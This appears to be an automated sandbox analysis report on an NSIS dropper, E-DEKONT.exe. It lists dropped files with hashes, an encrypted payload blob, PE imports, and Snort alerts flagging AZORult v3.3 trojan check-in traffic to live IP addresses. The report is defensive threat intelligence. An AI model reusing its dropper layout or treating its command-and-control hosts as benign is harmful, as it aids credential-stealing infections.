                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\vcruntime140.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):83784
                                                                          Entropy (8bit):6.890347360270656
                                                                          Encrypted:false
                                                                          SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                          MD5:7587BF9CB4147022CD5681B015183046
                                                                          SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                          SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                          SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):11776
                                                                          Entropy (8bit):5.659384359264642
                                                                          Encrypted:false
                                                                          SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                          MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                          SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                          SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                          SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Internalisere\Brnesangen.End

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):165922
                                                                          Entropy (8bit):6.737126845009294
                                                                          Encrypted:false
                                                                          SSDEEP:3072:mEYhKhav/hqkoeGD+8H2yAIkD6EZq85d3wkwaIg0sAjx:mEYA44nKbyAIbYVd6aIg0sA9
                                                                          MD5:3F1BF7D734732FD87ECBF1E4FD52AEAE
                                                                          SHA1:3A327F4434EF577622FC9510456CCCE11604FDBF
                                                                          SHA-256:63612F1C5186DBDE730BD2A0535BBC7DDF03E94E051360DF65104887230D5675
                                                                          SHA-512:D132D1F9FDC363617FC15377177524A72D532DC28D485552AEA810F3E6D51F5F674371CC4C45AB7A058C2B76EB04CD7AC42207D3A4E35DFDFA31CDC2AE822142
                                                                          Malicious:false
                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\memstat.c

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:C source, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):13484
                                                                          Entropy (8bit):5.15716859322729
                                                                          Encrypted:false
                                                                          SSDEEP:192:B3tdgdRmAMgyWkSctse3XX6ZjuguOixHRYqx0NzZW+08e:B3tuPdjJ0TCzZWv
                                                                          MD5:BD46EB22C1A1B4EA40373E8F57BFF4E3
                                                                          SHA1:CC2943E660BBB1697B7561F2776A7BCE2F36718A
                                                                          SHA-256:8361836BCB172722E5F2EE90AF31834B9B08B828A90E80E0BB930C336001B4CE
                                                                          SHA-512:5994643BCDFDF59B7EBF8FE36BC30CF0A454966FA95741D80AC81E9C42126A66ACDD782F6D7852A35CAE171FCC0DE1218EC1CD951829F7EC1C72B35EE7487D74
                                                                          Malicious:false
                                                                          Preview:/*.** 2018-09-27.**.** The author disclaims copyright to this source code. In place of.** a legal notice, here is a blessing:.**.** May you do good and not evil..** May you find forgiveness for yourself and forgive others..** May you share freely, never taking more than you give..**.*************************************************************************.**.** This file demonstrates an eponymous virtual table that returns information.** from sqlite3_status64() and sqlite3_db_status()..**.** Usage example:.**.** .load ./memstat.** .mode quote.** .header on.** SELECT * FROM memstat;.*/.#if !defined(SQLITE_CORE) || defined(SQLITE_ENABLE_MEMSTATVTAB).#if !defined(SQLITEINT_H).#include "sqlite3ext.h".#endif.SQLITE_EXTENSION_INIT1.#include <assert.h>.#include <string.h>..#ifndef SQLITE_OMIT_VIRTUALTABLE../* memstat_vtab is a subclass of sqlite3_vtab which will.** serve as the underlying representation of a memstat virtual table.*/.typedef struct memstat_vtab memsta

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\selection-end-symbolic.symbolic.png

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):138
                                                                          Entropy (8bit):5.559646592748364
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPl9vt3lAnsrtxBllO9p2hkq8PQ1/kbcw1w9lDk7kup:6v/lhPys8pQt8PQ2cw1IlDXup
                                                                          MD5:9863709F8F136F0F38A5D9CF2740143A
                                                                          SHA1:0EC6AA74A3FED4719B1B8D2E8468239489D84427
                                                                          SHA-256:2C86B3EDF2A397608FE0C12A634F175DE1E3C4E5C4610B8457578B549069A7B0
                                                                          SHA-512:B1D8DC9CAFF35264E117201C0DB2112F4C07BAB9235188D32F90B9D00DC2E7AC27ECC1FC9753C5F50949C95D91EEA0C5F318D6D1C8D7587CA0A68AD2CC1C4EB5
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR................a....sBIT....|.d....AIDAT8.c`........X..X......C...u..(&.%.. ..t.H6...$......S.F.....a/..&I......IEND.B`.

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\libxml2-2.0.typelib

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1245
                                                                          Entropy (8bit):5.462849750105637
                                                                          Encrypted:false
                                                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                          Malicious:false
                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\sgelngdernes.Dep74

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):69983
                                                                          Entropy (8bit):7.997405530190593
                                                                          Encrypted:true
                                                                          SSDEEP:1536:30X06uHVfTFBRFMyLsstapQk8OtIopWndeX21HGaOSpD:EXru1fpBRS6sstapQk8MIo6HPpD
                                                                          MD5:6DE0E12441560225A88B03873D0B3BC7
                                                                          SHA1:1347ABD05EAA3113A13312798CE559F448C95E00
                                                                          SHA-256:973DAB089CA03380DE5DCA62FAE9DA9B4FE1061B3F172B77753BBA7A6EB24B74
                                                                          SHA-512:58A5EED2318DEFC481CA1BB3C242FCE1B8DAEC929A1B3C0E1F25EDE97F3778BF7A0DAEF9D4E95CA9A0D04168033D546595E98A5506030CC7505E128F97069CC8
                                                                          Malicious:false
                                                                          Preview:.D....X....Y.2"...@K.lR._I.#sn.x.......P..$.B...XP....2.....fu..4+...G<...iv.SGhd^e....ME.{......{Rp...?F.yW....".Z.P.cI.....b...~..:ou&V.R...B.Ex..0.d...........|[MM /........]i..L..b.t.h......,...?@.s9.1.v..K.m.<.1.q.C..z...M$H;.S...x.C...B=n+.. ....O..b......g.Fr.....V,......*......o..)A5e.y#8..0......A_.J.l[g...W....H.NZwS.+...m.,.o.n.....q..L..;.......M.(V,...E.-..Z.v.....Bi..a..8..~....(..eb./......P<.......^]r....z.2.:......}....ZL....1......c.....X8.....+.(......h...:P......@;.h..M...q.}+.8...:......T.J<.]L..._..%...z.......#g..UbO.)..<t5.%.#..,..1.O...."].x.ZDAB.i6.mO...C...q(-....v,...n.`..;e..y..^.....*^kZ'.+.1..Wo..*..1..L B.e...I{...6P.e..B.4.'.^..m.u6.*.a...y..x.\.....H3s/,.5..x....Wm.J\9..<^.2...[|.jG....__E.o..y....X.....U..7...?...9.1t..U0.....)EN.i_.%..C.I.m..4.Q^D.c..h...c..u.f..3q..cl........u<h..tK..R...2F..U..K..P..+.dM_........8D....Sn.)..,k.xA.~...6;........H3....h.|...b....|.6c.a.;.....c...t.,..PF..mJ..8..$H....

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.761776865378202
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:E-DEKONT.exe
                                                                          File size:325782
                                                                          MD5:0aa36eb080cf7171cec271b2cd4d2108
                                                                          SHA1:eb7f3bf8e15ae16e765e480510d2260a9e9facb8
                                                                          SHA256:6ca208edbc718f737f74ee0a631ed22cd2bf67a0db679d9d1702575c087550cc
                                                                          SHA512:a350d13a00cfb426c046b370b018309fb614ab597159fc53a07b017143960d68dab186b71e12156bd8966234f49775f70d7bbfafe53ada4d7ded282d2780d489
                                                                          SSDEEP:6144:nQ606xDpoDTOfHQerv776jfhtjdTAhjr6ec5eF4fe8YCsboQ+Ni5JFapbARUTv/4:FpoPOfQqvH6j5PTIr6FZTQ+aJwp8KH4
                                                                          TLSH:136412502370C167D5B60BB0DA334EFB57369CA6E4496A8BC3507D8C7C72792AE2E349
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...6.uY.................f.........

                                                                          File Icon

                                                                          Icon Hash:c60ccd1616164e46

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x403373
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 000002D4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+14h], ebx
                                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                                          mov dword ptr [esp+1Ch], ebx
                                                                          call dword ptr [004080A8h]
                                                                          call dword ptr [004080A4h]
                                                                          and eax, BFFFFFFFh
                                                                          cmp ax, 00000006h
                                                                          mov dword ptr [00434EECh], eax
                                                                          je 00007F8358BE64D3h
                                                                          push ebx
                                                                          call 00007F8358BE9769h
                                                                          cmp eax, ebx
                                                                          je 00007F8358BE64C9h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 004082B0h
                                                                          push esi
                                                                          call 00007F8358BE96E3h
                                                                          push esi
                                                                          call dword ptr [00408150h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], 00000000h
                                                                          jne 00007F8358BE64ACh
                                                                          push 0000000Ah
                                                                          call 00007F8358BE973Ch
                                                                          push 00000008h
                                                                          call 00007F8358BE9735h
                                                                          push 00000006h
                                                                          mov dword ptr [00434EE4h], eax
                                                                          call 00007F8358BE9729h
                                                                          cmp eax, ebx
                                                                          je 00007F8358BE64D1h
                                                                          push 0000001Eh
                                                                          call eax
                                                                          test eax, eax
                                                                          je 00007F8358BE64C9h
                                                                          or byte ptr [00434EEFh], 00000040h
                                                                          push ebp
                                                                          call dword ptr [00408044h]
                                                                          push ebx
                                                                          call dword ptr [004082A0h]
                                                                          mov dword ptr [00434FB8h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push 000002B4h
                                                                          push eax
                                                                          push ebx
                                                                          push 0042B208h
                                                                          call dword ptr [00408188h]
                                                                          push 0040A2C8h

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x16898.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x65ef0x6600False0.6750919117647058data6.514810500836391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x149a0x1600False0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x2aff80x600False0.5162760416666666data4.036693470004838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x350000x410000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x760000x168980x16a00False0.7946089433701657data7.153289056271752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_BITMAP0x764780x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                                                          RT_ICON0x767e00x9d19PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                          RT_ICON0x805000x4102PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States
                                                                          RT_ICON0x846080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                          RT_ICON0x86bb00x16e8PNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States
                                                                          RT_ICON0x882980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                          RT_ICON0x893400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States
                                                                          RT_ICON0x8a1e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States
                                                                          RT_ICON0x8aa900x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                          RT_ICON0x8b0f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States
                                                                          RT_ICON0x8b6600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                          RT_ICON0x8bac80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                          RT_ICON0x8bdb00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                          RT_DIALOG0x8bed80x144dataEnglishUnited States
                                                                          RT_DIALOG0x8c0200x13cdataEnglishUnited States
                                                                          RT_DIALOG0x8c1600x100dataEnglishUnited States
                                                                          RT_DIALOG0x8c2600x11cdataEnglishUnited States
                                                                          RT_DIALOG0x8c3800xc4dataEnglishUnited States
                                                                          RT_DIALOG0x8c4480x60dataEnglishUnited States
                                                                          RT_GROUP_ICON0x8c4a80xaedataEnglishUnited States
                                                                          RT_MANIFEST0x8c5580x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          192.168.11.20104.21.44.19449852802029468 11/29/22-09:20:38.942380TCP2029468ET TROJAN Win32/AZORult V3.3 Client Checkin M154985280192.168.11.20104.21.44.194
                                                                          104.21.44.194192.168.11.2080498522029137 11/29/22-09:20:40.337285TCP2029137ET TROJAN AZORult v3.3 Server Response M28049852104.21.44.194192.168.11.20

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 29, 2022 09:20:37.826347113 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:37.826437950 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:37.826597929 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:37.854903936 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:37.854971886 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.144104958 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.144402981 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.272147894 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.272161007 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.272629023 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.272851944 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.279340982 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.320390940 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.411952019 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.412132025 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.412221909 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.412281990 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.412508011 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.412667036 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.542740107 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.542876005 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.542977095 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.542983055 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.543001890 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.543178082 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.543215990 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.543241978 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.543478966 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.543525934 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674145937 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.674294949 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674294949 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674339056 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674387932 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674515009 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.674655914 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674712896 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.674860954 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675086021 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675167084 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675200939 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675344944 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675391912 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675610065 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675615072 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675784111 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675805092 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.675893068 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.675935984 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.676100016 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.676116943 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.676171064 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.676223993 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.806499004 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806631088 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806648970 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806715012 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806741953 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.806744099 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.806791067 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.806931973 CET49851443192.168.11.20103.14.99.114
                                                                          Nov 29, 2022 09:20:38.807013035 CET49851443192.168.11.20103.14.99.114
